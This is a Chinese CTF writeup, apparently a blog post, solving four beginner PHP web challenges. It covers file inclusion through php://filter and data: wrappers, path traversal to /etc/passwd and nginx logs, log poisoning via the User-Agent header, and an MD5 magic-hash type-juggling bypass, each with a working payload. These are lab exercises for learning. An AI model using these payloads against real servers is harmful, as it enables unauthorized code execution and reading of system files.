[青少年CTF]Web-CheckMe01-04 writeup by q1jun

0x01 CheckMe01

进入环境,随意输入字符:

image-20221002121613125

看一下代码,发现$keys = base64_decode(urldecode($keys));

说明需要先将qsnctf字符进行base64编码才能使$keys=="qsnctf"判断成立。

image-20221002121753174

所以输入:

cXNuY3Rm

得到flag

image-20221002121844048

0x02 CheckMe02

打开题目的环境,发现是文件包含题:

image-20221002122324748

通过

?url=php://filter/read=convert.base64-encode/resource=index.php

php伪协议可以查看到index.php的源码的base64:

PHRpdGxlPkNoZWNrTWUtMDI8L3RpdGxlPg0KPD9waHANCnByaW50KCI8aDE+5qyi6L+O5p2l5YiwQ2hlY2tNZS0wMu+8jOW/q+adpeWvu+aJvuS9oOeahEZsYWflubbmj5DkuqTlkKfjgII8L2gxPiIpOw0KPz4NCjw/cGhwDQplcnJvcl9yZXBvcnRpbmcoMCk7DQokdXJsPSRfR0VUWyd1cmwnXTsNCmlmKGlzc2V0KCR1cmwpKXsNCiAgICBpbmNsdWRlKCR1cmwpOw0KfQ0KICAgIA0KPz4NCjxodG1sIGxhbmc9InpoLUNOIj4NCjw/cGhwDQogICAgICAgICAgICANCiAgICAgICAgICAgICRjb2RlPSI8P3BocCBpbmNsdWRlKCQiLiJfR0VUWyd1cmwnXSk7Pz4iOw0KICAgICAgICAgICAgaGlnaGxpZ2h0X3N0cmluZygkY29kZSk7DQogICAgPz4NCg==

解码得到:

<title>CheckMe-02</title>
<?php
print("<h1>欢迎来到CheckMe-02,快来寻找你的Flag并提交吧。</h1>");
?>
<?php
error_reporting(0);
$url=$_GET['url'];
if(isset($url)){
    include($url);
}

?>
<html lang="zh-CN">
<?php
            
            $code="<?php include($"."_GET['url']);?>";
            highlight_string($code);
    ?>

可以看出并没有做任何过滤,试试读取phpinfo():

?url=data:text/plain,<?php phpinfo();?>

image-20221002122920746

直接读取到FLAG。

0x03 CheckMe03

打开题目环境:

image-20221002123524270

还是文件包含题目,相比于CheckMe02这题把php伪协议过滤了。

但是还是可以读取到文件,比如/etc/passwd

?text=../../../etc/passwd

image-20221002123739090

那说明还可以通过日志来解析PHP语句。

根据nginx配置文件:

?text=../../../etc/nginx/nginx.conf

image-20221002123900075

可以推测access.log文件所在位置为/var/log/nginx/access.log,这个日志文件会记录http请求日志:

?text=../../../var/log/nginx/access.log

image-20221002124036248

所以通过发送一个包含<?php phpinfo();?>语句的http请求来写入access.log文件,这里就要用到burpsuite来拦截请求包,修改里面的User-Agent字段:

image-20221002124529654

然后再通过文件包含漏洞访问access.log日志文件:

image-20221002124615125

找到FLAG

image-20221002124646399

0x04 CheckMe04

打开题目环境:

image-20221002125008667

分析一下这段代码,变量a只能为字母,b只能为数字,然后他们各自的MD5值如果想等就输出flag。

这里通过0e截断可以做到,因为0e在是科学计数的语法,0e后面不管多大都是0

所以只需要找到两个0e开头的md5就行了

但不要忘了a只能是字母,b只能是数字:

a = QNKCDZO

md5(a) = 0e830400451993494058024219903391

b = 240610708

md5(b) = 0e462097431906509019562988736854

所以Payload:

http://xxx/?a=QNKCDZO&b=240610708

image-20221002125712512

  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值